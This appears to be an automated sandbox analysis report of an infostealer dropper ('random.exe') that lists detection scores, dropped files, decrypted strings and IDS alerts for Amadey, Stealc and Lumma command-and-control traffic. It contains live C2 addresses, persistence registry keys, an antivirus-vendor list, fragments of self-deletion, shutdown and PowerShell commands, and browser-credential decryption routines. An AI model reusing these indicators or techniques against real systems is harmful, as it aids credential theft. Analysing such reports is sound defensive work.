Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\1071541001\07ab034c92.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1071544001\cBeNU75.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1071546001\7fOMOTQ.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1071547001\Fe36XBk.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1071548001\Bjkm5hE.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1071550001\c9cc93b583.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1071551001\2ac0b54336.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1071552001\f803083b06.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 59%			Perma Link
Source: random.exe	ReversingLabs: Detection: 60%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: random.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 185.215.113.43
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: S-%lu-
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: abc3bc1985
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: skotes.exe
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Startup
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: rundll32
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Programs
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: %USERPROFILE%
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: cred.dll
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: clip.dll
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: http://
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: https://
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: /quiet
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: /Plugins/
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: &unit=
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: shell32.dll
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: kernel32.dll
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ProgramData\
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: AVAST Software
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Kaspersky Lab
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Panda Security
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Doctor Web
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 360TotalSecurity
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Bitdefender
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Norton
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Sophos
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Comodo
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: WinDefender
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 0123456789
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ------
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ?scr=1
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ComputerName
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: -unicode-
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: VideoID
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ProductName
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: CurrentBuild
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: rundll32.exe
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: "taskkill /f /im "
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: " && timeout 1 && del
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: && Exit"
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: " && ren
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Powershell.exe
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: shutdown -s -t 0
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: random

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6C4EA9A0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4E4440 PK11_PrivDecrypt,	2_2_6C4E4440
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6C4B4420
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4E44C0 PK11_PubEncrypt,	2_2_6C4E44C0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C5325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6C5325B0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6C4EA650
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4C8670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6C4C8670
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6C4CE6E0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C50A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6C50A730
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C510180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	2_2_6C510180
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4E43B0 PK11_PubEncryptPKCS1,PR_SetError,	2_2_6C4E43B0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C507C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	2_2_6C507C00
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	2_2_6C4C7D60
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C50BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	2_2_6C50BD30
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C509EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	2_2_6C509EC0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4E3FF0 PK11_PrivDecryptPKCS1,	2_2_6C4E3FF0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	2_2_6C4E9840
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	2_2_6C4E3850
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C50DA40 SEC_PKCS7ContentIsEncrypted,	2_2_6C50DA40
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4E3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	2_2_6C4E3560

Phishing

Yara detected Healer AV Disabler

Source: Yara match	File source: Process Memory Space: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE PID: 4408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE PID: 3756, type: MEMORYSTR

Yara detected obfuscated html page

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ID499IQcV.hta, type: DROPPED
Source: Yara match	File source: C:\Temp\akcRBGtSi.hta, type: DROPPED
Source: Yara match	File source: C:\Temp\sJKQarzEf.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, type: DROPPED

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55450 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55472 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55479 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55490 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55522 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:55531 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55534 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:63717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:63745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:63749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63752 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196397263.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: nss3.pdb@ source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: BitLockerToGo.pdb source: f2d6093d56.exe, 00000035.00000002.2949636350.000000000A250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000003.2299866873.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000002.2434685654.0000000000322000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000002.2403887822.0000000000322000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000003.2359065116.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE, 00000036.00000002.2525863117.0000000000382000.00000040.00000001.01000000.0000001B.sdmp, Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE, 00000036.00000003.2485387090.0000000005260000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196397263.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: f2d6093d56.exe, 00000035.00000002.2949636350.000000000A250000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:55232 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:55233
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55254 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55236 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55371 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55401 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55434 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55471 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55502 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.4:56208 -> 1.1.1.1:53
